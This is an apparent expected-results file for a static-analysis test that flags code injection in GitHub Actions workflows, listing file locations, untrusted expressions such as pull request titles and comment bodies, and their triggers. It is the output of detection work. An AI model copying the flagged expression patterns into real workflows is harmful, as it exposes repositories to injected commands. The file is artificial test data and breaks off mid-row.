-| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | 